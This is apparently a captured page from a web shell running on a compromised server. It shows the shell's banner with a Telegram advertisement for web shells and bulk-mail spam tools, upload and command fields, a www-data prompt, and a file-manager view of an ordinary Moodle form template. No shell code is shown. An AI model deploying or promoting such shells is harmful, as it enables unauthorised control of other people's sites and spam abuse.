__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
{{!
    This file is part of Moodle - http://moodle.org/
    Moodle is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.
    Moodle is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
    You should have received a copy of the GNU General Public License
    along with Moodle.  If not, see <http://www.gnu.org/licenses/>.
}}
{{!
    @template core_form/element-choicedropdown
    Choice dialog form element template.
    Context variables required for this template:
    * id - Element id,
    * nameraw - Raw Element name without '[]'
    * name - Element name,
    * label -  Element label,
    * multiple - multi select?,
    * checked - checked?,
    * error - Is there an error associated with this element?,
    * size - Element size,
    * value - Element value,
    * helpbutton - Helpbutton,
    * hiddenlabel - Element hidden flag,
    * frozen - Element frozen flag,
    * hardfrozen - Element hard fronzen flag,
    * extraclasses - Extra classes assocaited,
    * type - Element type,
    * attributes - Element attributes,
    * options - [
        {
            text - Option text,
            value - Option value,
            selected - Selected?,
            disabled - Disabled?,
            optionattributes - Option attributes
        }
    ]

    Example context (json):
    {
        "element": {
            "wrapperid": "fitem_id_choicedropdownfield",
            "iderror": "error_id_choicedropdownfield",
            "id": "id_choicedropdownfield",
            "nameraw": "choicedropdownfield",
            "name": "choicedropdownfield",
            "label": null,
            "multiple": null,
            "checked": null,
            "error": null,
            "size": null,
            "value": null,
            "helpbutton": "",
            "hiddenlabel": false,
            "frozen": false,
            "hardfrozen": false,
            "extraclasses": null,
            "type": "select",
            "attributes": "",
            "fieldicon": "<a class='btn'><i class='icon fa fa-ellipsis-h'></i></a>",
            "options": [
                {
                    "rawoptionid": "1",
                    "text": "Hidden",
                    "value": 0,
                    "selected": false,
                    "disabled": false,
                    "optionattributes": ""
                },
                {
                    "rawoptionid": "2",
                    "text": "Visible to everyone",
                    "value": 1,
                    "selected": true,
                    "disabled": false,
                    "optionattributes": ""
                },
                {
                    "rawoptionid": "3",
                    "text": "Allow only other course members to see my email address",
                    "value": 2,
                    "selected": false,
                    "disabled": false,
                    "optionattributes": ""
                }
            ]
        }
    }
}}
{{< core_form/element-template }}
    {{$element}}
        {{^element.frozen}}
        <select
            class="custom-select d-none {{#error}}is-invalid{{/error}}"
            name="{{element.name}}"
            id="{{element.id}}"
            data-region="choice-select"
            {{#element.multiple}}multiple{{/element.multiple}}
            {{#element.size}}size="{{element.size}}"{{/element.size}}
            {{#error}} autofocus aria-describedby="{{element.iderror}}" {{/error}}
            {{{element.attributes}}}
        >
            {{#element.select}}
                {{#options}}
                <option
                    value="{{value}}"
                    data-optionid="{{element.id}}_{{optionuniqid}}"
                    {{#selected}}selected{{/selected}}
                    {{#disabled}}disabled{{/disabled}}
                    {{{optionattributes}}}
                >
                    {{{name}}}
                </option>
                {{/options}}
            {{/element.select}}
        </select>
        {{#element.dropdown}}
            {{< core/local/dropdown/status}}
                {{$ buttonclasses }} btn btn-outline-secondary dropdown-toggle {{/ buttonclasses }}
            {{/ core/local/dropdown/status}}
        {{/element.dropdown}}
        {{/element.frozen}}
        {{#element.frozen}}
            {{#element.options}}
                {{#selected}}
                    {{{text}}}
                    {{^element.hardfrozen}}
                    <input
                        type="hidden"
                        name="{{element.name}}"
                        value="{{value}}"
                        id="{{element.id}}"
                    >
                    {{/element.hardfrozen}}
                {{/selected}}
            {{/element.options}}
        {{/element.frozen}}
    {{/element}}
{{/ core_form/element-template }}
{{#js}}
    require(['core_form/choicedropdown'], function(ChioceDropdown) {
        ChioceDropdown.init('{{element.id}}');
    });
{{/js}}

Filemanager

Name Type Size Permission Actions
collapsesections.mustache File 1.29 KB 0777
editor_textarea.mustache File 1.67 KB 0777
element-advcheckbox-inline.mustache File 1.36 KB 0777
element-advcheckbox.mustache File 2.8 KB 0777
element-autocomplete-inline.mustache File 1.82 KB 0777
element-autocomplete.mustache File 1.8 KB 0777
element-button-inline.mustache File 746 B 0777
element-button.mustache File 720 B 0777
element-checkbox-inline.mustache File 1.28 KB 0777
element-checkbox.mustache File 2.7 KB 0777
element-choicedropdown.mustache File 5.23 KB 0777
element-date_selector-inline.mustache File 307 B 0777
element-date_selector.mustache File 482 B 0777
element-date_time_selector-inline.mustache File 320 B 0777
element-date_time_selector.mustache File 490 B 0777
element-defaultcustom-inline.mustache File 1.36 KB 0777
element-defaultcustom.mustache File 1.62 KB 0777
element-duration-inline.mustache File 271 B 0777
element-duration.mustache File 31 B 0777
element-editor-inline.mustache File 143 B 0777
element-editor.mustache File 129 B 0777
element-filemanager.mustache File 835 B 0777
element-filepicker.mustache File 833 B 0777
element-filetypes.mustache File 31 B 0777
element-grading.mustache File 129 B 0777
element-group-inline.mustache File 292 B 0777
element-group.mustache File 1.44 KB 0777
element-header.mustache File 2.42 KB 0777
element-modgrade.mustache File 31 B 0777
element-modvisible.mustache File 32 B 0777
element-password-inline.mustache File 1.79 KB 0777
element-password.mustache File 1.76 KB 0777
element-passwordunmask-fill.mustache File 1.62 KB 0777
element-passwordunmask.mustache File 3.62 KB 0777
element-questioncategory-inline.mustache File 45 B 0777
element-questioncategory.mustache File 38 B 0777
element-radio-inline.mustache File 1.29 KB 0777
element-radio.mustache File 2.63 KB 0777
element-recaptcha.mustache File 129 B 0777
element-select-inline.mustache File 1.52 KB 0777
element-select.mustache File 4.51 KB 0777
element-selectgroups-inline.mustache File 1.21 KB 0777
element-selectgroups.mustache File 1.28 KB 0777
element-selectwithlink.mustache File 1.11 KB 0777
element-selectyesno-inline.mustache File 39 B 0777
element-selectyesno.mustache File 32 B 0777
element-static.mustache File 1.65 KB 0777
element-submit-inline.mustache File 1009 B 0777
element-submit.mustache File 1.14 KB 0777
element-tags-inline.mustache File 1.74 KB 0777
element-tags.mustache File 1.73 KB 0777
element-template-inline.mustache File 819 B 0777
element-template.mustache File 3 KB 0777
element-text-inline.mustache File 740 B 0777
element-text.mustache File 792 B 0777
element-textarea.mustache File 663 B 0777
element-url.mustache File 2.32 KB 0777
element-warning.mustache File 128 B 0777
element-wikieditor.mustache File 129 B 0777
filetypes-browser.mustache File 4.25 KB 0777
filetypes-descriptions.mustache File 1.72 KB 0777
filetypes-trigger.mustache File 1.39 KB 0777
setting_validation_failure.mustache File 1.17 KB 0777
Filemanager